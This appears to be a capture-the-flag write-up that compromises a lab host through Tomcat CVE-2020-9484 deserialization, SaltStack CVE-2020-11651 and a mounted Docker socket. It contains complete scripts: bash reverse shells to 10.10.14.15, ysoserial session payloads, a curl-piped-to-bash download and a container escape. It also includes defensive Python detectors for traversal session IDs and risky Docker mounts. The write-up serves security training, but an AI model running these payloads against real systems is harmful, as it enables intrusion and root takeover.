Basic information

Port scan

$ nmap -sC -sV 10.10.10.205

Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-02 14:10 CST
Nmap scan report for 10.10.10.205
Host is up (0.068s latency).
Not shown: 995 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
4567/tcp filtered tram
6666/tcp open zmtp ZeroMQ ZMTP 2.0
7676/tcp open imqbrokerd?
8080/tcp open http Apache Tomcat 9.0.27
|_http-title: VirusBucket
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.39 seconds

8080

Port 8080 hosts a malware analysis platform to which files can be uploaded.

CVE-2020-9484

Note the Tomcat version: 9.0.27. This version has a deserialization vulnerability; reference:

We can upload a malicious session file, but first we need to know the upload path. The path obtained from the earlier error message is the cache path, not the actual path.

Using a single dot as the filename produces an error message that reveals the upload path:

exploit & user flag

After that, it's deserialization all the way:

user.txt

Get a shell and read user.txt:

payload.sh

#!/bin/bash
bash -c "bash -i >& /dev/tcp/10.10.14.15/4444 0>&1"

script.sh

#!/bin/bash
java -jar /Users/miao/Tools/ysoserial-master-SNAPSHOT.jar CommonsCollections2 "curl 10.10.14.15:7778/payload.sh -o /tmp/payload.sh" > miao.session
curl 'http://10.10.10.205:8080/upload.jsp' -H 'Cookie: JSESSIONID=../../../../../opt/samples/uploads/miao' -F 'image=@miao.session'
curl 'http://10.10.10.205:8080/upload.jsp' -H 'Cookie: JSESSIONID=../../../../../opt/samples/uploads/miao'

java -jar /Users/miao/Tools/ysoserial-master-SNAPSHOT.jar CommonsCollections2 "chmod 777 /tmp/payload.sh" > chmod.session
curl 'http://10.10.10.205:8080/upload.jsp' -H 'Cookie: JSESSIONID=../../../../../opt/samples/uploads/chmod' -F 'image=@chmod.session'
curl 'http://10.10.10.205:8080/upload.jsp' -H 'Cookie: JSESSIONID=../../../../../opt/samples/uploads/chmod'

java -jar /Users/miao/Tools/ysoserial-master-SNAPSHOT.jar CommonsCollections2 "bash /tmp/payload.sh" > bash.session
curl 'http://10.10.10.205:8080/upload.jsp' -H 'Cookie: JSESSIONID=../../../../../opt/samples/uploads/bash' -F 'image=@bash.session'
curl 'http://10.10.10.205:8080/upload.jsp' -H 'Cookie: JSESSIONID=../../../../../opt/samples/uploads/bash'
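The script above relies on CVE-2020-9484: when Tomcat runs a PersistentManager with a FileStore, the path of the session file it deserializes is built from the JSESSIONID cookie, so a cookie containing `../` makes Tomcat load an attacker-uploaded file instead of a real session. The remediation is to upgrade (the issue was fixed in Tomcat 9.0.35) or to stop using a FileStore that an upload feature can write into, and to restrict deserialized classes with `sessionAttributeValueClassNameFilter`. As a defender-side addition that is not part of this write-up, the following Python detector scans Tomcat access-log lines for JSESSIONID values that contain path separators or parent-directory components, which a legitimate session id (an opaque hex token, optionally followed by `.jvmRoute`) never does. It assumes an AccessLogValve pattern of `%h %t "%r" %s "%{Cookie}i"` so that the Cookie header is logged as the last field (this is not Tomcat's default pattern), and the log lines are constructed samples.

```python
import re
from urllib.parse import unquote

# Constructed sample log lines in the assumed AccessLogValve format
# '%h %t "%r" %s "%{Cookie}i"' (Cookie header logged as the last field).
SAMPLE_LOG = """\
10.10.14.15 [02/Sep/2020:14:20:01 +0800] "POST /upload.jsp HTTP/1.1" 200 "JSESSIONID=../../../../../opt/samples/uploads/miao"
10.10.14.15 [02/Sep/2020:14:20:02 +0800] "GET /upload.jsp HTTP/1.1" 500 "JSESSIONID=../../../../../opt/samples/uploads/miao"
10.10.14.20 [02/Sep/2020:14:21:10 +0800] "GET /upload.jsp HTTP/1.1" 200 "JSESSIONID=%2E%2E%2F%2E%2E%2Fopt%2Fsamples%2Fuploads%2Fx"
192.168.1.5 [02/Sep/2020:14:22:30 +0800] "GET / HTTP/1.1" 200 "JSESSIONID=3F2B1A9C8D7E6F5A4B3C2D1E0F9A8B7C.node1"
192.168.1.6 [02/Sep/2020:14:23:00 +0800] "GET /index.html HTTP/1.1" 200 "-"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) "(?P<cookie>[^"]*)"$'
)
# JSESSIONID may appear anywhere in the Cookie header, separated by ';'.
JSESSIONID_RE = re.compile(r'(?:^|;\s*)JSESSIONID=([^;]*)')


def jsessionid_from_cookie(cookie_header):
    """Return the JSESSIONID value from a Cookie header, or None if absent."""
    m = JSESSIONID_RE.search(cookie_header)
    return m.group(1) if m else None


def is_traversal_session_id(session_id):
    """True if the id contains '..' or a path separator, even when
    percent-encoded once or twice. A single dot is allowed because Tomcat
    appends '.jvmRoute' to session ids in clustered setups."""
    decoded = unquote(unquote(session_id))
    return re.search(r'(\.\.|[/\\])', decoded) is not None


def find_cve_2020_9484_attempts(log_text):
    """Return (client ip, request line, decoded session id) for every
    request whose JSESSIONID looks like a path-traversal attempt."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # line not in the expected format; skip rather than guess
        sid = jsessionid_from_cookie(m.group('cookie'))
        if sid and is_traversal_session_id(sid):
            hits.append((m.group('ip'), m.group('request'), unquote(unquote(sid))))
    return hits


if __name__ == "__main__":
    for ip, request, sid in find_cve_2020_9484_attempts(SAMPLE_LOG):
        print(f"{ip} {request!r} JSESSIONID -> {sid}")
```

Any hit is worth an alert on its own: even a failed attempt (the 500 response in the second sample line) shows that someone is probing for a writable FileStore path, and the decoded id tells you which directory they believe Tomcat can reach.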

one.sh

You can also get a shell from a single session file, as long as the command is encoded to work with Java's Runtime.exec:

#!/bin/bash
cmd="bash -c 'bash -i >& /dev/tcp/10.10.14.15/4444 0>&1'"
command="bash -c {echo,$(echo -n $cmd | base64)}|{base64,-d}|{bash,-i}"
java -jar /Users/miao/Tools/ysoserial-master-SNAPSHOT.jar CommonsCollections4 "$command" > ./one.session
curl 'http://10.10.10.205:8080/upload.jsp' -H 'Cookie: JSESSIONID=../../../../../opt/samples/uploads/one' -F 'image=@one.session'
curl 'http://10.10.10.205:8080/upload.jsp' -H 'Cookie: JSESSIONID=../../../../../opt/samples/uploads/one'

Information gathering

Checking the listening ports reveals two local ports, 4505 and 4506:

netstat -anp
...
tcp 0 0 127.0.0.1:4505 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:4506 0.0.0.0:* LISTEN -
...

Searching for these ports shows they belong to SaltStack, which has a known vulnerability, CVE-2020-11651.

Port forwarding

Upload socat and forward the port:

wget 10.10.14.15:7778/socat
chmod +x socat
./socat TCP-LISTEN:4609,fork,reuseaddr TCP:127.0.0.1:4506

exploit

Then run the exploit directly:

python3 exploit.py --master 10.10.10.205 --port 4609 --exec "curl 10.10.14.15:7778/payload1.sh | bash"

This gives root inside the Docker container:

payload1.sh

#!/bin/bash
bash -c "bash -i >& /dev/tcp/10.10.14.15/4445 0>&1"

Privilege escalation information

A /var/run/docker.sock is present; through this socket the container can talk to the Docker daemon on the host:

From here you can either use the Docker API directly, or copy the host's docker binary into the container and operate with it.
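A mounted Docker socket is equivalent to root on the host, because whoever can talk to the daemon can start a container with any host path bind-mounted (exactly what the next section does with /root). As a defender-side addition that is not part of this write-up, here is a Python audit that reads the JSON produced by `docker inspect` and flags containers that have the daemon socket or a sensitive host path bind-mounted, or that run privileged; it also includes a check to run from inside a container to see whether the socket is reachable at all. The inspect data below is a constructed sample that only includes the `Name`, `HostConfig` and `Mounts` fields the audit uses.

```python
import json
import os

# Constructed sample in the shape of `docker inspect <container> ...` output,
# trimmed to the fields this audit reads.
SAMPLE_INSPECT = json.dumps([
    {"Name": "/sandbox-worker",
     "HostConfig": {"Privileged": False,
                    "Binds": ["/var/run/docker.sock:/var/run/docker.sock",
                              "/opt/samples:/samples:ro"]},
     "Mounts": [{"Type": "bind", "Source": "/var/run/docker.sock",
                 "Destination": "/var/run/docker.sock", "RW": True},
                {"Type": "bind", "Source": "/opt/samples",
                 "Destination": "/samples", "RW": False}]},
    {"Name": "/web",
     "HostConfig": {"Privileged": False, "Binds": []},
     "Mounts": [{"Type": "volume", "Source": "webdata", "Destination": "/data", "RW": True}]},
    {"Name": "/builder",
     "HostConfig": {"Privileged": True, "Binds": ["/:/host"]},
     "Mounts": [{"Type": "bind", "Source": "/", "Destination": "/host", "RW": True}]},
])

DOCKER_SOCKETS = {"/var/run/docker.sock", "/run/docker.sock"}
# Host directories whose exposure hands over credentials, config or the whole host.
SENSITIVE_HOST_PATHS = {"/", "/root", "/etc", "/var/run", "/run", "/home"}


def audit_containers(inspect_json):
    """Map container name -> list of findings for risky host exposure."""
    findings = {}
    for container in json.loads(inspect_json):
        name = container.get("Name", "?").lstrip("/")
        issues = []
        if container.get("HostConfig", {}).get("Privileged"):
            issues.append("privileged: full device and capability access to the host")
        for mount in container.get("Mounts", []):
            if mount.get("Type") != "bind":
                continue  # named volumes do not expose arbitrary host paths
            src = mount.get("Source", "")
            dst = mount.get("Destination", "?")
            if src in DOCKER_SOCKETS:
                issues.append(f"docker socket {src} mounted at {dst}: equivalent to host root")
            elif src in SENSITIVE_HOST_PATHS:
                mode = "rw" if mount.get("RW", True) else "ro"
                issues.append(f"sensitive host path {src} mounted {mode} at {dst}")
        if issues:
            findings[name] = issues
    return findings


def reachable_docker_sockets(paths=DOCKER_SOCKETS):
    """Run inside a container: return the daemon socket paths that exist and
    are writable by the current user (writable means API calls are possible)."""
    return sorted(p for p in paths if os.path.exists(p) and os.access(p, os.W_OK))


if __name__ == "__main__":
    for name, issues in audit_containers(SAMPLE_INSPECT).items():
        for issue in issues:
            print(f"[{name}] {issue}")
    print("reachable sockets here:", reachable_docker_sockets())
```

Run the audit on the host with `docker inspect $(docker ps -q)` piped into `audit_containers`; the second function is what an incident responder would run inside a suspect container to confirm the escape path before the attacker does. If a workload genuinely needs the socket, give it a restricted proxy rather than the raw socket, and never combine it with sensitive bind mounts.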

Privilege escalation

# on the host
tomcat@VirusBucket:/usr/bin$ python3 -m http.server 6789

# inside the container
wget 172.17.0.1:6789/docker
chmod +x docker
python3 -c 'import pty; pty.spawn("/bin/sh")'

./docker images
REPOSITORY TAG IMAGE ID CREATED SIZE
sandbox latest a24bb4013296 3 months ago 5.57MB
<none> <none> 188a2704d8b0 4 months ago 1.06GB

./docker run -v /root:/mnt -it sandbox

root flag

With /root mounted in the container, read root.txt:

References